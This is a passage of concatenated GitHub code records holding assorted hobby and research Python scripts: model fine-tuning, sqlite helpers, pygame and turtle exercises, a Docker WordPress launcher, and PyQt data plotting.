total\n time_end = time.time()\n print(time_mid - time_start)\n print(time_end - time_mid)\n print(time_end - time_start)\n return result\n\n\ndef check_input(start, end):\n try:\n start = int(start)\n end = int(end)\n except ValueError:\n raise ValueError('Wrong year.')\n if start < 1900 or end < 1900:\n raise ValueError('Wrong year.')\n if start > end:\n raise ValueError('Wrong range.')\n return start, end\n","repo_name":"ignatyevm/test_task","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13001035151","text":"import numpy as np\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\n\r\nfrom datasets import load_dataset, load_metric\r\n\r\nimport transformers\r\nfrom transformers import AutoTokenizer\r\nfrom transformers import AutoModelForSequenceClassification, TrainingArguments, Trainer\r\n\r\nprint(transformers.__version__)\r\n\r\ndataset_base = load_dataset(\"./frenchmedmcqa.py\")\r\n\r\ndataset_train = dataset_base[\"train\"]\r\nprint(len(dataset_train))\r\n\r\ndataset_val = dataset_base[\"validation\"]\r\nprint(len(dataset_val))\r\n\r\ndataset_test = dataset_base[\"test\"]\r\nprint(len(dataset_test))\r\n\r\nmetric = load_metric(\"accuracy\")\r\n\r\ntask = \"frenchmedmcqa\"\r\nnum_labels = 31\r\n\r\nbatch_size = 4 # XLM-ROBERTA-BASE\r\n# batch_size = 6 # RTX 2080 Ti\r\n# batch_size = 32 # V100\r\n# batch_size = 24\r\n# batch_size = 16\r\n\r\nEPOCHS = 10\r\n\r\n# model_checkpoint = \"dmis-lab/biobert-base-cased-v1.2\"\r\n# model_checkpoint = \"dmis-lab/biobert-v1.1\"\r\n# model_checkpoint = \"microsoft/BiomedNLP-PubMedBERT-base-uncased-abstract-fulltext\"\r\n# model_checkpoint = \"camembert-base\"\r\n# model_checkpoint = \"xlm-roberta-base\"\r\nmodel_checkpoint = \"allenai/scibert_scivocab_uncased\"\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model_checkpoint, use_fast=True)\r\nmodel = AutoModelForSequenceClassification.from_pretrained(model_checkpoint, num_labels=num_labels)\r\n\r\nmetric_name = \"accuracy\"\r\nmodel_name = model_checkpoint.split(\"/\")[-1]\r\n\r\ndef preprocess_function(examples):\r\n return tokenizer(examples[\"bert_text\"], truncation=True, 
max_length=model.config.max_position_embeddings) # THE ONE\r\n\r\ndataset_train = dataset_train.map(preprocess_function, batched=True)\r\ndataset_val = dataset_val.map(preprocess_function, batched=True)\r\ndataset_test = dataset_test.map(preprocess_function, batched=True)\r\n\r\nargs = TrainingArguments(\r\n f\"{model_name}-finetuned-{task}\",\r\n evaluation_strategy = \"epoch\",\r\n save_strategy = \"epoch\",\r\n learning_rate=2e-5,\r\n per_device_train_batch_size=batch_size,\r\n per_device_eval_batch_size=batch_size,\r\n num_train_epochs=EPOCHS,\r\n weight_decay=0.01,\r\n load_best_model_at_end=True,\r\n metric_for_best_model=metric_name,\r\n push_to_hub=False,\r\n)\r\n\r\ndef compute_metrics(pred):\r\n labels = pred.label_ids\r\n preds = pred.predictions.argmax(-1)\r\n precision, recall, f1, _ = precision_recall_fscore_support(labels, preds, average='weighted')\r\n acc = accuracy_score(labels, preds)\r\n return {\r\n 'accuracy': acc,\r\n 'f1': f1,\r\n 'precision': precision,\r\n 'recall': recall\r\n }\r\n\r\ntrainer = Trainer(\r\n model,\r\n args,\r\n train_dataset=dataset_train,\r\n eval_dataset=dataset_val,\r\n tokenizer=tokenizer,\r\n compute_metrics=compute_metrics,\r\n)\r\n\r\ntrainer.train()\r\n\r\ntrainer.evaluate()\r\n","repo_name":"qanastek/FrenchMedMCQA","sub_path":"Transformers Classifier/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"71987977793","text":"def save_data_in_db(city, date, temp, hum):\n import sqlite3\n con = sqlite3.connect(\"weather_data.db\")\n cur = con.cursor()\n # data = (data['dt'], data['main']['temp'], data['main']['humidity'])\n cr_command = f\"CREATE TABLE IF NOT EXISTS {city} (date,temperature,humidity)\"\n cur.execute(cr_command)\n ins_command = \"INSERT INTO {} VALUES {};\".format(city, (date, temp, hum))\n cur.execute(ins_command)\n con.commit()\n con.close()\n print(\"Saved data in database\")\n\n\ndef check_db(city):\n import sqlite3\n con = sqlite3.connect(\"weather_data.db\")\n cur = con.cursor()\n command = f\"SELECT * FROM {city}\"\n cur.execute(command)\n for i in cur.fetchall():\n print(i)\n","repo_name":"ThePythonist/Weather-Telegram-Bot","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30082096801","text":"import heapq\ndef findsthLargest(nums, k):\n\theap = []\n\theapq.heapify(heap)\n\tfor i in range(len(nums)):\n\t\theapq.heappush(heap,nums[i])\n\n\tres=[]\n\tres.append([y for y in heapq.nsmallest(k, heap)])\n\tprint(res)\n\treturn res[-1][-1]\n\nprint(findsthLargest([5,2,3,1,9],4))","repo_name":"zvut/CODING-PRACTICE","sub_path":"kthsmallest.py","file_name":"kthsmallest.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5833688924","text":"#!/usr/bin/env python3\nfrom os import name, system\nfrom turtle import Turtle, Screen, colormode\nimport random\n# import colorgram\n\n\ndef clear():\n if name == 'nt':\n system('cls')\n else:\n system('clear')\n\n\nclear()\ntim = Turtle()\n# Task #1\n# timmy_the_turtle.hideturtle()\n# timmy_the_turtle.color('black', 'dark green')\n\n# Task #2\n# for _ in range(15):\n# tim.forward(10)\n# tim.penup()\n# tim.forward(10)\n# tim.pendown()\n\n# Task #3\n# def draw_shape(num_sides):\n# angle = 360 / sides\n# for _ in 
range(sides):\n# tim.right(angle)\n# tim.forward(100)\n#\n# colormode(255)\n# for sides in range(3,11):\n# tim.color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n# draw_shape(sides)\n\n\n# Task #4\n# def random_color():\n# r = random.randint(0, 255)\n# g = random.randint(0, 255)\n# b = random.randint(0, 255)\n# randomized_color = (r, g, b)\n# return randomized_color\n#\n#\n# def random_step():\n# tim.color(random_color())\n# # tim.width(random.randint(1,10))\n# tim.seth(random.randrange(0, 271, 90))\n# tim.forward(30)\n#\n#\n# colormode(255)\n# tim.width(10)\n# tim.speed(10)\n# for _ in range(200):\n# random_step()\n\n\n# Task #5\n# def random_color():\n# r = random.randint(0, 255)\n# g = random.randint(0, 255)\n# b = random.randint(0, 255)\n# randomized_color = (r, g, b)\n# return randomized_color\n#\n#\n# colormode(255)\n# tim.speed('fastest')\n#\n#\n# def draw_spirograph(size_of_gap):\n# for _ in range(int(360 / size_of_gap)):\n# tim.color(random_color())\n# tim.circle(100)\n# tim.setheading(tim.heading() + size_of_gap)\n#\n#\n# draw_spirograph(2)\n\n\n# Task #6\n# rgb_colors = []\n# for color in colors:\n# r = color.rgb.r\n# g = color.rgb.g\n# b = color.rgb.b\n# new_color = (r, g, b)\n# rgb_colors.append(new_color)\ntim.hideturtle()\ntim.speed('fastest')\ncolormode(255)\ntim.penup()\ntim.setheading(225)\ntim.forward(300)\ntim.setheading(0)\ncolor_list = [(22, 27, 46), (59, 93, 148), (116, 162, 206), (190, 225, 243), (74, 121, 199), (40, 24, 35),\n (36, 56, 112), (187, 143, 164), (215, 243, 239), (120, 78, 94), (237, 221, 199), (164, 184, 232),\n (135, 215, 232), (237, 206, 219), (191, 155, 138), (39, 24, 19), (190, 87, 109), (123, 87, 78),\n (230, 167, 185), (21, 31, 27), (106, 41, 55), (144, 174, 167), (86, 101, 95), (72, 147, 174),\n (147, 216, 209), (206, 86, 75), (232, 173, 163), (117, 40, 35), (215, 200, 152), (99, 144, 134)]\nfor _ in range(10):\n for _ in range(10):\n # Drop dot, move forward\n tim.dot(20, random.choice(color_list))\n tim.forward(50)\n # Move up and start over\n tim.seth(90)\n tim.forward(50)\n tim.seth(180)\n tim.forward(500)\n tim.seth(0)\n\nscreen = Screen()\nscreen.exitonclick()\n","repo_name":"Appl3Tree/Python","sub_path":"100 Days of Code/Day 018 - Turtle & the Graphical User Interface (GUI)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585768321","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 30 11:13:35 2017\r\n\r\n@author: Julien\r\n\"\"\"\r\n\r\nimport os\r\nimport math\r\nfrom operator import itemgetter\r\nfrom decimal import *\r\n\r\ngetcontext().prec=10\r\n\r\n\r\nchem=\"C:/CodeJam/Exo A\"\r\nFhIn=\"A-large.in\"\r\nFhOut=\"Result\"+FhIn\r\n\r\n\r\ndef calc(panList):\r\n cal=0\r\n for p in panList:\r\n cal+=(2*math.pi*p[0]*p[1])\r\n radius=[p[0] for p in panList]\r\n \r\n cal+=(math.pi*max(radius)*max(radius))\r\n return cal\r\n\r\ndef surf(pancake):\r\n return (2*math.pi*pancake[0]*pancake[1] + pancake[0]*pancake[0]*math.pi)\r\n\r\ndef hauteur(pancake):\r\n return (2*math.pi*pancake[0]*pancake[1])\r\n \r\n\r\ndef solve(N,K,panList):\r\n \r\n for i in range(N):\r\n panList[i].append(surf(panList[i]))\r\n panList[i].append(hauteur(panList[i]))\r\n \r\n test=True\r\n index=0\r\n panSurf=sorted(panList,key=lambda x: x[2],reverse=True)\r\n# print(\"Surf\")\r\n# print(panSurf)\r\n while(test):\r\n rad=panSurf[index][0]\r\n# print(panSurf[index])\r\n panH=[panSurf[x] for x in 
range(len(panSurf)) if x!=index]\r\n# print(panH)\r\n if len(panH)>=K-1:\r\n panRes=[panSurf[index]]\r\n panH=sorted(panH,key=lambda x: x[3],reverse=True)\r\n for i in range(K-1):\r\n panRes.append(panH[i])\r\n test=False\r\n else:\r\n index+=1\r\n \r\n \r\n \r\n panH=sorted(panList,key=lambda x: x[2],reverse=True)\r\n \r\n \r\n \r\n# print(panRes)\r\n return calc(panRes)\r\n \r\n\r\n\r\n\r\nwith open(os.path.join(chem,FhIn),'r') as f:\r\n with open(os.path.join(chem,FhOut),'w') as fOut:\r\n C=int(f.readline())\r\n \r\n for c in range(C):\r\n# c=4\r\n [N,K]=[int(x) for x in f.readline().split()]\r\n panList=[]\r\n for p in range(N):\r\n panList.append([int(x) for x in f.readline().split()])\r\n \r\n r=solve(N,K,panList)\r\n \r\n fOut.write(\"Case #\"+str(c+1)+\": \" + str(\"%.10f\" % r) +'\\n')\r\n ","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/300.py","file_name":"300.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25894280465","text":"import time\n\ndef load(storage:list[dict], last_request:dict):\n is_success = False\n for each in storage: # Search for variable by name\n if each.get(\"var_name\") == last_request.get(\"var_name\"):\n time.sleep(each.get(\"var_size\")/1000) # Execution time\n is_success = True # Success\n break\n return {\"is_success\": is_success}\n\n\ndef store(storage:list[dict], last_request:dict, capacity:int, in_use:int):\n is_success = False\n for each in storage: # Search for variable\n if each.get(\"var_name\") == last_request.get(\"var_name\"):\n return {\"is_success\": True} # If found directly return\n\n if last_request.get(\"var_size\") + in_use <= capacity: # If size does not overflow capacity\n storage.append(last_request) # Store\n in_use += last_request.get(\"var_size\")\n time.sleep(last_request.get(\"var_size\")/1000) # Execution time\n is_success = True\n \n return {\"storage\": storage, \"in_use\": in_use, \"is_success\": is_success}\n\n\ndef update(storage:list[dict], last_request:dict, capacity:int, in_use:int):\n old_request = dict()\n is_success = False # Not found\n\n for each in storage: # Search for the request\n if each.get(\"var_name\") == last_request.get(\"var_name\"):\n old_request = each\n is_success = True # Found\n break\n \n if is_success: # If found, check size\n size_diff = last_request.get(\"var_size\") - old_request.get(\"var_size\")\n if in_use + size_diff <= capacity: # If does not overflow the capacity\n storage.remove(old_request) # Delete old\n time.sleep(old_request.get(\"var_size\")/1000) # Execution time\n\n storage.append(last_request) # Add new\n in_use += size_diff\n time.sleep(last_request.get(\"var_size\")/1000) # Execution time\n \n return {\"storage\": storage, \"in_use\": in_use, \"is_success\": is_success}","repo_name":"canbatuhan/mesh-sv","sub_path":"functions/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18283049204","text":"import pygame\r\nimport random\r\nimport sys\r\n\r\n\r\npygame.init()\r\n\r\nWIDTH = 800\r\nHEIGHT = 600\r\n\r\nbackground = pygame.image.load(\"C:/Users/DELL/Documents/Mission-Cube/data/background1.png\")\r\nbackground1 = pygame.image.load(\"C:/Users/DELL/Documents/Mission-Cube/data/cube.png\")\r\n\r\nbackground2 = pygame.image.load(\"C:/Users/DELL/Documents/Mission-Cube/data/cube2.png\")\r\n\r\nGREEN = 
(0,128,0)\r\nRED = (255,0,0)\r\nPURPLE = (128,0,128)\r\nORANGE = (255,165,0)\r\nBLUE = (0, 255, 255)\r\ncolours = [BLUE, GREEN, RED, PURPLE]\r\nBACKGROUND_COLOUR = (0,0,0)\r\n\r\nmusic = pygame.mixer.music.load(\"C:/Users/DELL/Documents/Mission-Cube/data/song2.mp3\")\r\npygame.mixer.music.play(-1)\r\n\r\nSPEED = 10\r\n\r\nplayer_size = 50\r\nplayer_pos = [WIDTH/2, HEIGHT - 1.1*player_size]\r\nx_po = player_pos[0]\r\ny_po = player_pos[1]\r\n\r\nenemy_size = 50\r\nenemy_pos = [random.randint(0, WIDTH - enemy_size), 0]\r\nenemy_list = [enemy_pos]\r\n\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\r\n\r\nscore = 0\r\n\r\ngame_over = False\r\n\r\nfinish = True\r\n\r\nclock = pygame.time.Clock()\r\n\r\nfont = pygame.font.SysFont(\"monospace\", 25)\r\n\r\n\r\nclass button(object):\r\n \"\"\"docstring for ClassName\"\"\"\r\n def __init__(self, arg):\r\n super(ClassName, self).__init__()\r\n self.arg = arg\r\n\r\n\r\ndef drop_enemies(enemy_list):\r\n delay = random.random()\r\n if len(enemy_list) < 15 and delay < 0.1:\r\n x_pos = random.randint(0, WIDTH - enemy_size)\r\n y_pos = 0\r\n enemy_list.append([x_pos, y_pos])\r\n\r\ndef draw_enemies(enemy_list):\r\n x = 0\r\n for enemy_pos in enemy_list:\r\n pygame.draw.rect(screen, BLUE, (enemy_pos[0], enemy_pos[1], enemy_size, enemy_size))\r\n\r\ndef set_level(score, SPEED):\r\n if score < 10:\r\n SPEED = 10\r\n elif score < 30:\r\n SPEED = 15\r\n elif score < 50:\r\n SPEED = 20\r\n elif score < 70:\r\n SPEED = 25\r\n elif score < 80:\r\n SPEED = 30\r\n else:\r\n SPEED = 50\r\n return SPEED\r\n\r\ndef update_enemy_pos(enemy_list, score):\r\n for idx, enemy_pos in enumerate(enemy_list):\r\n if enemy_pos[1] >= 0 and enemy_pos[1] < HEIGHT:\r\n enemy_pos[1] += SPEED\r\n else:\r\n enemy_list.pop(idx)\r\n score += 1\r\n return score\r\n if detect_collision(player_pos, enemy_pos):\r\n game_over = True\r\n finish = True\r\n\r\ndef collision_check(enemy_list, player_pos):\r\n for enemy_pos in enemy_list:\r\n if detect_collision(enemy_pos, player_pos):\r\n return True\r\n return False\r\n\r\ndef detect_collision(player_pos, enemy_pos):\r\n p_x = player_pos[0]\r\n p_y = player_pos[1]\r\n\r\n e_x = enemy_pos[0]\r\n e_y = enemy_pos[1]\r\n\r\n if (e_x >= p_x and e_x < (p_x + player_size)) or (p_x >= e_x and p_x < (e_x + enemy_size)):\r\n if (e_y >= p_y and e_y < (p_y + player_size)) or (p_y >= e_y and p_y < (e_y + enemy_size)):\r\n return True\r\n return False\r\n\r\n\r\n\r\ndef show_go_screen():\r\n holo = True\r\n while holo:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n holo = False\r\n\r\n screen.fill((0,0,0))\r\n clock.tick(30)\r\n screen.blit(background2,(0, 0))\r\n text1 = \" \" + str(score)\r\n label1 = font.render(text1, 1, (255, 255, 255))\r\n screen.blit(label1, (WIDTH-445, HEIGHT- 523) )\r\n pygame.display.update()\r\n\r\nmenu = True\r\n\r\nwhile not game_over:\r\n\r\n while menu:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n pygame.mixer.music.stop()\r\n menu = False\r\n music = pygame.mixer.music.load(\"C:/Users/DELL/Documents/Mission-Cube/data/song1.mp3\")\r\n pygame.mixer.music.play(-1)\r\n\r\n\r\n screen.fill((0,0,0))\r\n clock.tick(30)\r\n screen.blit(background1,(0, 0))\r\n pygame.display.update()\r\n\r\n\r\n\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n if 
event.type == pygame.KEYDOWN:\r\n\r\n x = player_pos[0]\r\n y = player_pos[1]\r\n\r\n if event.key == pygame.K_LEFT and x > 40:\r\n x -= 50\r\n elif event.key == pygame.K_RIGHT and x < WIDTH - player_size - 49.5:\r\n x += 50\r\n player_pos = [x, y]\r\n\r\n\r\n\r\n screen.fill(BACKGROUND_COLOUR)\r\n\r\n drop_enemies(enemy_list)\r\n score = update_enemy_pos(enemy_list, score)\r\n\r\n SPEED = set_level(score, SPEED)\r\n\r\n text = \"Score : \" + str(score)\r\n label = font.render(text, 1, RED)\r\n screen.blit(label, (WIDTH-170, HEIGHT-40) )\r\n\r\n if collision_check(enemy_list, player_pos):\r\n game_over = True\r\n\r\n draw_enemies(enemy_list)\r\n\r\n pygame.draw.rect(screen, ORANGE, (player_pos[0], player_pos[1], player_size, player_size))\r\n\r\n clock.tick(30)\r\n\r\n pygame.display.update()\r\n\r\nif finish:\r\n pygame.mixer.music.stop()\r\n music = pygame.mixer.music.load(\"C:/Users/DELL/Documents/Mission-Cube/data/song3.mp3\")\r\n pygame.mixer.music.play(0)\r\n show_go_screen()\r\n finish = False\r\n","repo_name":"HootchGaming/Mission-Cube-Game","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19000999510","text":"import pygame\r\n\r\n\r\nclass Snake(object):\r\n # intialize all properties (the default direction towards right/the default size is 2)\r\n def __init__(self):\r\n self.dirction = pygame.K_RIGHT\r\n self.body = []\r\n for x in range(2):\r\n self.addnode()\r\n\r\n # Add cell in front of the snake\r\n def addnode(self):\r\n left, top = (0, 0)\r\n if self.body:\r\n left, top = (self.body[0].left, self.body[0].top)\r\n node = pygame.Rect(left, top, 25, 25)\r\n if self.dirction == pygame.K_LEFT:\r\n node.left -= 25\r\n elif self.dirction == pygame.K_RIGHT:\r\n node.left += 25\r\n elif self.dirction == pygame.K_UP:\r\n node.top -= 25\r\n elif self.dirction == pygame.K_DOWN:\r\n node.top += 25\r\n self.body.insert(0, node)\r\n\r\n # Delete all cell\r\n def delnode(self):\r\n self.body.pop()\r\n\r\n # how to die\r\n def isdead(self, size_x, size_y):\r\n # when to hit the wall\r\n if self.body[0].x not in range(size_x):\r\n return True\r\n if self.body[0].y not in range(size_y):\r\n return True\r\n # when the snake hits itself\r\n if self.body[0] in self.body[1:]:\r\n return True\r\n return False\r\n\r\n # Move!\r\n def move(self):\r\n self.addnode()\r\n self.delnode()\r\n\r\n # change direction\r\n def changedirection(self, curkey):\r\n LR = [pygame.K_LEFT, pygame.K_RIGHT]\r\n UD = [pygame.K_UP, pygame.K_DOWN]\r\n if curkey in LR + UD:\r\n if (curkey in LR) and (self.dirction in LR):\r\n return\r\n if (curkey in UD) and (self.dirction in UD):\r\n return\r\n self.dirction = curkey","repo_name":"JiaoyangXu/GreedySnake","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14399985846","text":"import subprocess\nimport sys\n# Function made to check if Docker compose is installed or not and if not it will install\ndef check_docker():\n try:\n subprocess.run([\"docker\", \"--version\"], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n print(\"Docker is installed.\")\n except FileNotFoundError:\n print(\"Docker is not installed.\")\n\ndef create_wordpress_site(site_name):\n try:\n subprocess.run([\"docker\", \"run\", \"-d\", \"--name\", site_name, \"-p\", \"8080:80\", \"-v\", 
f\"{site_name}:/var/www/html\", \"wordpress:latest\"])\n subprocess.run([\"docker\", \"exec\", site_name, \"chown\", \"-R\", \"www-data:www-data\", \"/var/www/html\"])\n print(\"WordPress site created successfully!\")\n print(f\"Access your site at http://localhost:8080/{site_name}\")\n except subprocess.CalledProcessError as e:\n print(f\"Error creating the WordPress site: {e}\")\n\n\ndef stop_wordpress_site(site_name):\n try:\n subprocess.run([\"docker\", \"stop\", site_name])\n print(\"WordPress site stopped successfully!\")\n except subprocess.CalledProcessError as e:\n print(f\"Error stopping the WordPress site: {e}\")\n\ndef start_wordpress_site(site_name):\n try:\n subprocess.run([\"docker\", \"start\", site_name])\n print(\"WordPress site started successfully!\")\n except subprocess.CalledProcessError as e:\n print(f\"Error starting the WordPress site: {e}\")\n\n\ndef main():\n print(\"Checking Docker installation...\")\n check_docker()\n if len(sys.argv) < 2:\n print(\"Please provide the site name as a command-line argument.\")\n print(\"Usage: python3 create_wordpress.py \")\n sys.exit(1)\n\n subcommand = sys.argv[1]\n site_name = sys.argv[2]\n \n if subcommand == \"create\":\n create_wordpress_site(site_name)\n elif subcommand == \"stop\":\n stop_wordpress_site(site_name)\n elif subcommand == \"start\":\n start_wordpress_site(site_name)\n else:\n print(\"Invalid subcommand.\")\n print(\"Available subcommands: create, stop, start\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Niku2420/RT-Camp-Assignmnet","sub_path":"pythonScript.py","file_name":"pythonScript.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40940900507","text":"import os\nimport datetime\n\nfrom peewee import *\n\nfrom common import *\nimport settings\nfrom model.basic_contract_random_name import BasicContractRandomName\n\nclass SymbolRandom:\n def createRandomSymbolOnceTime(self):\n print(\"running createRandomSymbolOnceTime\")\n names = GetSymbolName()\n idx = 1\n for name in names:\n self._saveData(name)\n idx = idx +1\n # print(idx)\n \n def _saveData(self,name):\n #cursor = settings.db.cursor()\n try:\n BasicContractRandomName.create(name=name,\n last_update_date=datetime.datetime.now())\n # time = datetime.datetime.now()\n # sql = \"insert into basic_contract_random_name( \\\n # name, last_update_date) \\\n # values ('%s','%s') \" % \\\n # (name,time)\n # cursor.execute(sql)\n # settings.db.commit()\n except Exception as e:\n print(e)\n #settings.db.rollback()","repo_name":"wins1978/ib_source","sub_path":"once_tasks/symbol_random.py","file_name":"symbol_random.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13574610524","text":"from SendReceive import filename2\r\nimport threading # 导入线程模块\r\nfrom PyQt5 import QtWidgets, QtCore\r\nfrom PyQt5.QtCore import QTimer, QThread, pyqtSignal,QObject\r\nfrom PyQt5.QtWidgets import QApplication\r\nimport time\r\n\r\nimport os\r\n\r\nimport struct\r\nimport pyqtgraph.opengl as gl\r\nimport pyqtgraph as pg\r\nimport numpy as np\r\n\r\n\r\nclass ReadThread(QtCore.QThread):\r\n # 通过类成员对象定义信号对象\r\n signal = pyqtSignal(str)\r\n\r\n def __init__(self):\r\n super(ReadThread, self).__init__()\r\n\r\n def __del__(self):\r\n self.wait()\r\n\r\n def run(self):\r\n for i in range(100):\r\n time.sleep(0.2)\r\n self.signal.emit(str(i)) # 注意这里与_signal = 
pyqtSignal(str)中的类型相同\r\n print(threading.current_thread(), time.ctime(time.time()), 'run时间')\r\n\r\n\r\ndef fdaq_changename(self):\r\n name = filename2\r\n time0 = int(self.ui.lineEdit_16.text())#设置文件命的开始\r\n cycle = int(self.ui.lineEdit_18.text())#设置文件名的结束\r\n t1 = threading.Thread(target=writefile, args=[time0,cycle,]) # 写dat线程\r\n t1.setDaemon(True)\r\n t1.start()\r\n t2 = threading.Thread(target=dattotxt, args=[time0, cycle, ]) # dat-txt线程\r\n t2.setDaemon(True)\r\n t2.start()\r\n t3 = threading.Thread(target=alldatafile, args=[time0, cycle, ]) # dat-txt线程\r\n t3.setDaemon(True)\r\n t3.start()\r\n\r\n '''self.t4 = ReadThread()\r\n self.t4.signal.connect(lambda: self.plottxt0) # 画图plottxt\r\n self.t4.start()\r\n self.t4.quit()\r\n self.t4.wait()'''\r\n plottxt(self)\r\n print('over')\r\n print(threading.current_thread(), time.ctime(time.time()), '主线程和时间')\r\n\r\ndef stop():\r\n print('stop')\r\n#模仿fdaq创建dat文件\r\ndef writefile(time0 = 9,cycle = 0):\r\n x = 11\r\n y = 12\r\n z = 13\r\n a = 0.11111111111\r\n for i in range(cycle,time0):\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = str(i)\r\n name = ''.join(rename)\r\n with open(name,'wb') as f:\r\n s = struct.pack('iiid',x,y,z,a) #i是整数,d是double精度\r\n f.write(s)\r\n x += x\r\n y += y\r\n z += z\r\n time.sleep(10)#每十秒生成一个dat文件\r\n print(threading.current_thread(), time.ctime(time.time()), '线程1')\r\n f = open(name, 'rb')\r\n cont = f.read()\r\n cont1 = struct.unpack('iiid',cont)\r\n f.close()\r\n\r\n\r\n#dat转txt文件的线程\r\ndef dattotxt(time0 = 9,cycle = 0):\r\n for i in range(cycle,time0):\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = str(i)\r\n name = ''.join(rename)\r\n time.sleep(11)\r\n with open(name, 'rb') as datfile:\r\n data0 = datfile.read()\r\n data = struct.unpack('iiid',data0)\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = str(i)\r\n rename[-3] = 't'\r\n rename[-2] = 'x'\r\n name = ''.join(rename)\r\n txtfile = open(name, 'a+')\r\n data1 = str(' '.join(map(str, data)))\r\n txtfile.write(data1)\r\n txtfile.close()\r\n print(threading.current_thread(), time.ctime(time.time()), '线程2')\r\n\r\n\r\n\r\ndef alldatafile(time0 = 9,cycle = 0):\r\n for i in range(cycle, time0):\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = str(i)\r\n rename[-3] = 't'\r\n rename[-2] = 'x'\r\n name = ''.join(rename)\r\n time.sleep(12)\r\n with open(name, 'r') as datfile:\r\n data = datfile.read()\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = 't'\r\n rename[-3] = 't'\r\n rename[-2] = 'x'\r\n name = ''.join(rename)\r\n txtfile = open(name, 'a+')\r\n txtfile.write(data + '\\n')\r\n txtfile.close()\r\n print('over')\r\n\r\ndef plottxt0(self, msg):\r\n print('33333')\r\n self.ui.progressBar_2.setValue(int(msg))\r\n\r\n\r\ndef plottxt(self):\r\n plot_plt1 = gl.GLViewWidget() # 实例化一个绘图部件\r\n plot_plt2 = gl.GLViewWidget()\r\n plot_plt3 = gl.GLViewWidget()\r\n # self.ui.plot_plt.showGrid(x=True, y=True) # 显示图形网格\r\n self.ui.gridLayout_10.addWidget(plot_plt1, 0, 0, 1, 1)\r\n self.ui.gridLayout_10.addWidget(plot_plt2, 0, 1, 2, 2)\r\n self.ui.gridLayout_10.addWidget(plot_plt3, 1, 0, 1, 1)\r\n # 添加绘图部件到线图部件的网格布局层\r\n # 将上述部件添加到布局层中\r\n # W.setWindowTitle('pyqtgraph example: GLScatterPlotItem')\r\n plot_plt1.opts['distance'] = 150\r\n plot_plt2.opts['distance'] = 200\r\n plot_plt3.opts['distance'] = 200\r\n plot_plt1.opts['elevation'] = 0\r\n plot_plt2.opts['elevation'] = 30\r\n plot_plt3.opts['elevation'] = -90\r\n gx = gl.GLGridItem()\r\n gy = 
gl.GLGridItem()\r\n gz = gl.GLGridItem()\r\n gx.setSize(100, 100, 100)\r\n gx.setSpacing(10, 10, 10)\r\n gx.rotate(90, 0, 1, 0)\r\n gx.translate(0, 50, 50)\r\n gy.setSize(100, 100, 100)\r\n gy.setSpacing(10, 10, 10)\r\n gy.rotate(90, 1, 0, 0)\r\n gy.translate(50, 0, 50)\r\n gz.setSize(100, 100, 100)\r\n gz.setSpacing(10, 10, 10)\r\n gz.translate(50, 50, 0)\r\n plot_plt1.addItem(gx)\r\n plot_plt2.addItem(gx)\r\n plot_plt3.addItem(gx)\r\n plot_plt1.addItem(gy)\r\n plot_plt2.addItem(gy)\r\n plot_plt3.addItem(gy)\r\n plot_plt1.addItem(gz)\r\n plot_plt2.addItem(gz)\r\n plot_plt3.addItem(gz)\r\n name = ''.join(filename2)\r\n rename = list(name)\r\n rename[-5] = 't'\r\n rename[-3] = 't'\r\n rename[-2] = 'x'\r\n name = ''.join(rename)\r\n print(name)\r\n timebar = 0\r\n while not os.access(name, os.R_OK):\r\n print('no file')\r\n QApplication.processEvents()\r\n time.sleep(1)\r\n if os.access(name, os.F_OK):\r\n x, y, z, r = [], [], [], []\r\n with open(name) as file_object:\r\n lines = 